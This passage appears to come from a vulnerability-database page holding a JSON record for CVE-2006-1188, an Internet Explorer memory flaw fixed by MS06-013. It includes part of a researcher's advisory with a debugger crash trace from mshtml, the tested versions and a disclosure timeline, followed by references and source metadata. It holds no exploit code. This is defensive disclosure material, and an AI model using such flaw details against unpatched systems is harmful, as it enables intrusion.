0fb65508         movzx   edx,byte ptr [ebp+0x8]\n\u003e         7d529d1f 8d849680000000   lea     eax,[esi+edx*4+0x80]\n\u003e         7d529d26 5e               pop     esi\n\u003e         7d529d27 5d               pop     ebp\n\u003e         7d529d28 c20c00           ret     0xc\n\u003e         7d529d2b 90               nop\n\u003e         7d529d2c 90               nop\n\u003e         7d529d2d 90               nop\n\u003e         7d529d2e 90               nop\n\u003e         7d529d2f 90               nop\n\u003e         7d529d30 8bff             mov     edi,edi\n\u003e         7d529d32 55               push    ebp\n\u003e         7d529d33 8bec             mov     ebp,esp\n\u003e FAULT -\u003e7d529d35 0fbe4114         movsx   eax,byte ptr [ecx+0x14]\n\u003e                                           ds:0023:00000014=??\n\u003e         7d529d39 c1e004           shl     eax,0x4\n\u003e         7d529d3c 0578aa4b7d       add     eax,0x7d4baa78\n\u003e         7d529d41 7410             jz      mshtml+0x79d53 (7d529d53)\n\u003e         7d529d43 8b400c           mov     eax,[eax+0xc]\n\u003e         7d529d46 234508           and     eax,[ebp+0x8]\n\u003e         7d529d49 f7d8             neg     eax\n\u003e         7d529d4b 1bc0             sbb     eax,eax\n\u003e         7d529d4d f7d8             neg     eax\n\u003e         7d529d4f 5d               pop     ebp\n\u003e         7d529d50 c20400           ret     0x4\n\u003e         7d529d53 33c0             xor     eax,eax\n\u003e         7d529d55 ebf8             jmp     mshtml+0x79d4f (7d529d4f)\n\no Vulnerable versions:\n=====================\n\nThe DoS vulnerability was successfully tested on:\n\u003e MS IE 6 SP2 - Win XP Pro SP2\n\u003e MS IE 6     - Win 2k SP4\n\no Disclosure Timeline:\n=====================\n\nxx Feb 06 - Vulnerabilities discovered. \n08 Mar 06 - Vendor contacted. \n22 Mar 06 - Vendor confirmed vulnerabilities. \n25 May 06 - Public release. \n\no Solution:\n==========\n\nInstall the latest security update (MS06-013) for Internet Explorer [2]. \n\no Credits:\n=========\n\nThomas Waldegger \u003cbugtraq@morph3us.org\u003e\nBuHa-Security Community - http://buha.info/board/\n\nIf you have questions, suggestions or criticism about the advisory feel\nfree to send me a mail. The address \u0027bugtraq@morph3us.org\u0027 is more a\nspam address than a regular mail address therefore it\u0027s possible that\nsome mails get ignored. Please use the contact details at\nhttp://morph3us.org/ to contact me. \n\nGreets fly out to cyrus-tc, destructor, nait, rhy, trappy and all\nmembers of BuHa",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2006-1188"
      },
      {
        "db": "CERT/CC",
        "id": "VU#341028"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2006-000174"
      },
      {
        "db": "CERT/CC",
        "id": "VU#939605"
      },
      {
        "db": "CERT/CC",
        "id": "VU#876678"
      },
      {
        "db": "CERT/CC",
        "id": "VU#434641"
      },
      {
        "db": "CERT/CC",
        "id": "VU#234812"
      },
      {
        "db": "CERT/CC",
        "id": "VU#641460"
      },
      {
        "db": "CERT/CC",
        "id": "VU#824324"
      },
      {
        "db": "CERT/CC",
        "id": "VU#984473"
      },
      {
        "db": "CERT/CC",
        "id": "VU#680526"
      },
      {
        "db": "CERT/CC",
        "id": "VU#740372"
      },
      {
        "db": "BID",
        "id": "17468"
      },
      {
        "db": "VULHUB",
        "id": "VHN-17296"
      },
      {
        "db": "PACKETSTORM",
        "id": "45345"
      },
      {
        "db": "PACKETSTORM",
        "id": "38386"
      },
      {
        "db": "PACKETSTORM",
        "id": "46765"
      }
    ],
    "trust": 9.45
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-17296",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-17296"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#824324",
        "trust": 3.4
      },
      {
        "db": "NVD",
        "id": "CVE-2006-1188",
        "trust": 3.0
      },
      {
        "db": "USCERT",
        "id": "TA06-101A",
        "trust": 2.6
      },
      {
        "db": "SECUNIA",
        "id": "18957",
        "trust": 2.5
      },
      {
        "db": "CERT/CC",
        "id": "VU#959049",
        "trust": 1.7
      },
      {
        "db": "VUPEN",
        "id": "ADV-2006-1318",
        "trust": 1.7
      },
      {
        "db": "SECTRACK",
        "id": "1015900",
        "trust": 1.7
      },
      {
        "db": "CERT/CC",
        "id": "VU#740372",
        "trust": 1.6
      },
      {
        "db": "CERT/CC",
        "id": "VU#939605",
        "trust": 1.6
      },
      {
        "db": "CERT/CC",
        "id": "VU#680526",
        "trust": 1.6
      },
      {
        "db": "BID",
        "id": "17468",
        "trust": 1.2
      },
      {
        "db": "CERT/CC",
        "id": "VU#234812",
        "trust": 0.9
      },
      {
        "db": "CERT/CC",
        "id": "VU#876678",
        "trust": 0.9
      },
      {
        "db": "CERT/CC",
        "id": "VU#984473",
        "trust": 0.9
      },
      {
        "db": "CERT/CC",
        "id": "VU#641460",
        "trust": 0.9
      },
      {
        "db": "CERT/CC",
        "id": "VU#341028",
        "trust": 0.9
      },
      {
        "db": "CERT/CC",
        "id": "VU#434641",
        "trust": 0.9
      },
      {
        "db": "SECUNIA",
        "id": "15891",
        "trust": 0.9
      },
      {
        "db": "SECUNIA",
        "id": "19583",
        "trust": 0.8
      },
      {
        "db": "SECUNIA",
        "id": "18680",
        "trust": 0.8
      },
      {
        "db": "SECUNIA",
        "id": "16373",
        "trust": 0.8
      },
      {
        "db": "SECUNIA",
        "id": "19269",
        "trust": 0.8
      },
      {
        "db": "SECUNIA",
        "id": "19606",
        "trust": 0.8
      },
      {
        "db": "SECUNIA",
        "id": "19378",
        "trust": 0.8
      },
      {
        "db": "BID",
        "id": "17181",
        "trust": 0.8
      },
      {
        "db": "BID",
        "id": "14594",
        "trust": 0.8
      },
      {
        "db": "XF",
        "id": "21895",
        "trust": 0.8
      },
      {
        "db": "SECTRACK",
        "id": "1014727",
        "trust": 0.8
      },
      {
        "db": "SECUNIA",
        "id": "16480",
        "trust": 0.8
      },
      {
        "db": "XF",
        "id": "21193",
        "trust": 0.8
      },
      {
        "db": "BID",
        "id": "14087",
        "trust": 0.8
      },
      {
        "db": "OSVDB",
        "id": "17680",
        "trust": 0.8
      },
      {
        "db": "SECTRACK",
        "id": "1014329",
        "trust": 0.8
      },
      {
        "db": "USCERT",
        "id": "SA06-101A",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2006-000174",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200604-164",
        "trust": 0.7
      },
      {
        "db": "EXPLOIT-DB",
        "id": "1838",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-17296",
        "trust": 0.1
      },
      {
        "db": "CERT/CC",
        "id": "VU#503124",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "45345",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "38386",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "46765",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#234812"
      },
      {
        "db": "CERT/CC",
        "id": "VU#876678"
      },
      {
        "db": "CERT/CC",
        "id": "VU#680526"
      },
      {
        "db": "CERT/CC",
        "id": "VU#984473"
      },
      {
        "db": "CERT/CC",
        "id": "VU#824324"
      },
      {
        "db": "CERT/CC",
        "id": "VU#641460"
      },
      {
        "db": "CERT/CC",
        "id": "VU#341028"
      },
      {
        "db": "CERT/CC",
        "id": "VU#434641"
      },
      {
        "db": "CERT/CC",
        "id": "VU#740372"
      },
      {
        "db": "CERT/CC",
        "id": "VU#939605"
      },
      {
        "db": "VULHUB",
        "id": "VHN-17296"
      },
      {
        "db": "BID",
        "id": "17468"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2006-000174"
      },
      {
        "db": "PACKETSTORM",
        "id": "45345"
      },
      {
        "db": "PACKETSTORM",
        "id": "38386"
      },
      {
        "db": "PACKETSTORM",
        "id": "46765"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200604-164"
      },
      {
        "db": "NVD",
        "id": "CVE-2006-1188"
      }
    ]
  },
  "id": "VAR-200604-0201",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-17296"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-11-29T21:24:21.138000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "MS06-013",
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/bulletin/MS06-013.mspx"
      },
      {
        "title": "MS06-013",
        "trust": 0.8,
        "url": "http://www.microsoft.com/japan/technet/security/bulletin/MS06-013.mspx"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2006-000174"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2006-1188"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.8,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms06-013.mspx"
      },
      {
        "trust": 2.5,
        "url": "http://www.us-cert.gov/cas/techalerts/ta06-101a.html"
      },
      {
        "trust": 2.5,
        "url": "http://www.kb.cert.org/vuls/id/824324"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/archive/1/435096/30/4710/threaded"
      },
      {
        "trust": 1.7,
        "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-013"
      },
      {
        "trust": 1.7,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1144"
      },
      {
        "trust": 1.7,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1290"
      },
      {
        "trust": 1.7,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1296"
      },
      {
        "trust": 1.7,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1773"
      },
      {
        "trust": 1.7,
        "url": "http://securitytracker.com/id?1015900"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/18957"
      },
      {
        "trust": 1.7,
        "url": "http://www.vupen.com/english/advisories/2006/1318"
      },
      {
        "trust": 1.6,
        "url": "http://www.kb.cert.org/vuls/id/959049"
      },
      {
        "trust": 1.6,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-052.mspx"
      },
      {
        "trust": 1.6,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-037.mspx"
      },
      {
        "trust": 1.6,
        "url": "about vulnerability notes"
      },
      {
        "trust": 1.6,
        "url": "contact us about this vulnerability"
      },
      {
        "trust": 1.6,
        "url": "provide a vendor statement"
      },
      {
        "trust": 0.9,
        "url": "http://www.microsoft.com/technet/security/advisory/903144.mspx"
      },
      {
        "trust": 0.9,
        "url": "http://www.sec-consult.com/184.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/19583/"
      },
      {
        "trust": 0.8,
        "url": "http://msdn.microsoft.com/archive/default.asp?url=/archive/en-us/dnarmdac/html/msdn_remtdata.asp"
      },
      {
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/advisory/917077.mspx"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/18680/"
      },
      {
        "trust": 0.8,
        "url": "http://blogs.technet.com/msrc/archive/2006/03/22/422849.aspx"
      },
      {
        "trust": 0.8,
        "url": "http://msdn.microsoft.com/workshop/author/dhtml/reference/methods/createtextrange.asp"
      },
      {
        "trust": 0.8,
        "url": "http://www.microsoft.com/com/default.mspx"
      },
      {
        "trust": 0.8,
        "url": "http://msdn.microsoft.com/library/default.asp?url=/workshop/components/activex/activex_node_entry.asp"
      },
      {
        "trust": 0.8,
        "url": "http://support.microsoft.com/kb/159621"
      },
      {
        "trust": 0.8,
        "url": "http://support.microsoft.com/kb/216434"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/archive/1/391803"
      },
      {
        "trust": 0.8,
        "url": "http://www.kb.cert.org/vuls/id/939605"
      },
      {
        "trust": 0.8,
        "url": "http://www.kb.cert.org/vuls/id/740372"
      },
      {
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx"
      },
      {
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-038.mspx"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/16373/"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/19269/"
      },
      {
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms06-015.mspx"
      },
      {
        "trust": 0.8,
        "url": "http://support.microsoft.com/kb/918165"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/19606/"
      },
      {
        "trust": 0.8,
        "url": "http://jeffrey.vanderstad.net/grasshopper/"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/19378/"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/17181 "
      },
      {
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/advisory/906267.mspx"
      },
      {
        "trust": 0.8,
        "url": "http://www.kb.cert.org/vuls/id/680526"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/16480/"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/14594"
      },
      {
        "trust": 0.8,
        "url": "http://www.securitytracker.com/alerts/2005/aug/1014727.html"
      },
      {
        "trust": 0.8,
        "url": "http://xforce.iss.net/xforce/xfdb/21895"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/15891/ "
      },
      {
        "trust": 0.8,
        "url": "http://www.securitytracker.com/alerts/2005/jun/1014329.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.osvdb.org/displayvuln.php?osvdb_id=17680"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/14087"
      },
      {
        "trust": 0.8,
        "url": "http://xforce.iss.net/xforce/xfdb/21193"
      },
      {
        "trust": 0.8,
        "url": "http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33120"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1188"
      },
      {
        "trust": 0.8,
        "url": "http://www.frsirt.com/english/advisories/2006/1318"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnta06-101a/index.html"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/tr/trta06-101a/"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2006-1188"
      },
      {
        "trust": 0.8,
        "url": "http://secunia.com/advisories/18957/"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/17468"
      },
      {
        "trust": 0.8,
        "url": "http://www.us-cert.gov/cas/alerts/sa06-101a.html"
      },
      {
        "trust": 0.8,
        "url": "http://xforce.iss.net/xforce/alerts/id/220"
      },
      {
        "trust": 0.8,
        "url": "http://xforce.iss.net/xforce/alerts/id/217"
      },
      {
        "trust": 0.3,
        "url": "http://www.mozilla.com/"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/435096"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/641460\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://update.microsoft.com/microsoftupdate\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1189\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-0003\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1185\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/984473\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/341028\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1388\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-0012\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.us-cert.gov/reading_room/securing_browser/#internet_ex"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1188\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.us-cert.gov/cas/signup.html\u003e."
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/234812\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/434641\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/824324\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.us-cert.gov/cas/techalerts/ta06-101a.html\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1359\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms06-apr.mspx\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1245\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/503124\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1186\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/876678\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.kb.cert.org/vuls/id/959049\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.us-cert.gov/legal.html\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/10/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/9/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/11/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/secunia_vacancies/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/15891/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html"
      },
      {
        "trust": 0.1,
        "url": "http://en.wikipedia.org/wiki/internet_explorer"
      },
      {
        "trust": 0.1,
        "url": "http://www.microsoft.com/windows/ie/default.mspx"
      },
      {
        "trust": 0.1,
        "url": "http://morph3us.org/advisories/20060525-msie6-sp2-2.txt"
      },
      {
        "trust": 0.1,
        "url": "http://www.w3.org/tr/html4/loose.dtd\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://buha.info/board/"
      },
      {
        "trust": 0.1,
        "url": "http://www.microsoft.com/windows/ie/"
      },
      {
        "trust": 0.1,
        "url": "http://morph3us.org/"
      },
      {
        "trust": 0.1,
        "url": "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1188"
      },
      {
        "trust": 0.1,
        "url": "http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#234812"
      },
      {
        "db": "CERT/CC",
        "id": "VU#876678"
      },
      {
        "db": "CERT/CC",
        "id": "VU#680526"
      },
      {
        "db": "CERT/CC",
        "id": "VU#984473"
      },
      {
        "db": "CERT/CC",
        "id": "VU#824324"
      },
      {
        "db": "CERT/CC",
        "id": "VU#641460"
      },
      {
        "db": "CERT/CC",
        "id": "VU#341028"
      },
      {
        "db": "CERT/CC",
        "id": "VU#434641"
      },
      {
        "db": "CERT/CC",
        "id": "VU#740372"
      },
      {
        "db": "CERT/CC",
        "id": "VU#939605"
      },
      {
        "db": "VULHUB",
        "id": "VHN-17296"
      },
      {
        "db": "BID",
        "id": "17468"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2006-000174"
      },
      {
        "db": "PACKETSTORM",
        "id": "45345"
      },
      {
        "db": "PACKETSTORM",
        "id": "38386"
      },
      {
        "db": "PACKETSTORM",
        "id": "46765"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200604-164"
      },
      {
        "db": "NVD",
        "id": "CVE-2006-1188"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#234812"
      },
      {
        "db": "CERT/CC",
        "id": "VU#876678"
      },
      {
        "db": "CERT/CC",
        "id": "VU#680526"
      },
      {
        "db": "CERT/CC",
        "id": "VU#984473"
      },
      {
        "db": "CERT/CC",
        "id": "VU#824324"
      },
      {
        "db": "CERT/CC",
        "id": "VU#641460"
      },
      {
        "db": "CERT/CC",
        "id": "VU#341028"
      },
      {
        "db": "CERT/CC",
        "id": "VU#434641"
      },
      {
        "db": "CERT/CC",
        "id": "VU#740372"
      },
      {
        "db": "CERT/CC",
        "id": "VU#939605"
      },
      {
        "db": "VULHUB",
        "id": "VHN-17296"
      },
      {
        "db": "BID",
        "id": "17468"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2006-000174"
      },
      {
        "db": "PACKETSTORM",
        "id": "45345"
      },
      {
        "db": "PACKETSTORM",
        "id": "38386"
      },
      {
        "db": "PACKETSTORM",
        "id": "46765"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200604-164"
      },
      {
        "db": "NVD",
        "id": "CVE-2006-1188"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2006-04-11T00:00:00",
        "db": "CERT/CC",
        "id": "VU#234812"
      },
      {
        "date": "2006-03-23T00:00:00",
        "db": "CERT/CC",
        "id": "VU#876678"
      },
      {
        "date": "2005-08-19T00:00:00",
        "db": "CERT/CC",
        "id": "VU#680526"
      },
      {
        "date": "2006-04-11T00:00:00",
        "db": "CERT/CC",
        "id": "VU#984473"
      },
      {
        "date": "2006-04-11T00:00:00",
        "db": "CERT/CC",
        "id": "VU#824324"
      },
      {
        "date": "2006-04-11T00:00:00",
        "db": "CERT/CC",
        "id": "VU#641460"
      },
      {
        "date": "2006-04-11T00:00:00",
        "db": "CERT/CC",
        "id": "VU#341028"
      },
      {
        "date": "2006-04-11T00:00:00",
        "db": "CERT/CC",
        "id": "VU#434641"
      },
      {
        "date": "2005-08-18T00:00:00",
        "db": "CERT/CC",
        "id": "VU#740372"
      },
      {
        "date": "2005-07-02T00:00:00",
        "db": "CERT/CC",
        "id": "VU#939605"
      },
      {
        "date": "2006-04-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-17296"
      },
      {
        "date": "2006-04-11T00:00:00",
        "db": "BID",
        "id": "17468"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2006-000174"
      },
      {
        "date": "2006-04-12T04:12:55",
        "db": "PACKETSTORM",
        "id": "45345"
      },
      {
        "date": "2005-07-01T23:31:00",
        "db": "PACKETSTORM",
        "id": "38386"
      },
      {
        "date": "2006-05-29T07:36:29",
        "db": "PACKETSTORM",
        "id": "46765"
      },
      {
        "date": "2006-04-11T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200604-164"
      },
      {
        "date": "2006-04-11T23:02:00",
        "db": "NVD",
        "id": "CVE-2006-1188"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2006-11-02T00:00:00",
        "db": "CERT/CC",
        "id": "VU#234812"
      },
      {
        "date": "2006-04-11T00:00:00",
        "db": "CERT/CC",
        "id": "VU#876678"
      },
      {
        "date": "2007-10-11T00:00:00",
        "db": "CERT/CC",
        "id": "VU#680526"
      },
      {
        "date": "2006-04-11T00:00:00",
        "db": "CERT/CC",
        "id": "VU#984473"
      },
      {
        "date": "2006-04-11T00:00:00",
        "db": "CERT/CC",
        "id": "VU#824324"
      },
      {
        "date": "2006-05-15T00:00:00",
        "db": "CERT/CC",
        "id": "VU#641460"
      },
      {
        "date": "2006-04-11T00:00:00",
        "db": "CERT/CC",
        "id": "VU#341028"
      },
      {
        "date": "2006-04-12T00:00:00",
        "db": "CERT/CC",
        "id": "VU#434641"
      },
      {
        "date": "2005-10-13T00:00:00",
        "db": "CERT/CC",
        "id": "VU#740372"
      },
      {
        "date": "2005-07-12T00:00:00",
        "db": "CERT/CC",
        "id": "VU#939605"
      },
      {
        "date": "2018-10-18T00:00:00",
        "db": "VULHUB",
        "id": "VHN-17296"
      },
      {
        "date": "2006-05-26T19:48:00",
        "db": "BID",
        "id": "17468"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2006-000174"
      },
      {
        "date": "2021-07-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200604-164"
      },
      {
        "date": "2024-11-21T00:08:15.770000",
        "db": "NVD",
        "id": "CVE-2006-1188"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200604-164"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "RDS.Dataspace ActiveX control bypasses ActiveX security model",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#234812"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200604-164"
      }
    ],
    "trust": 0.6
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.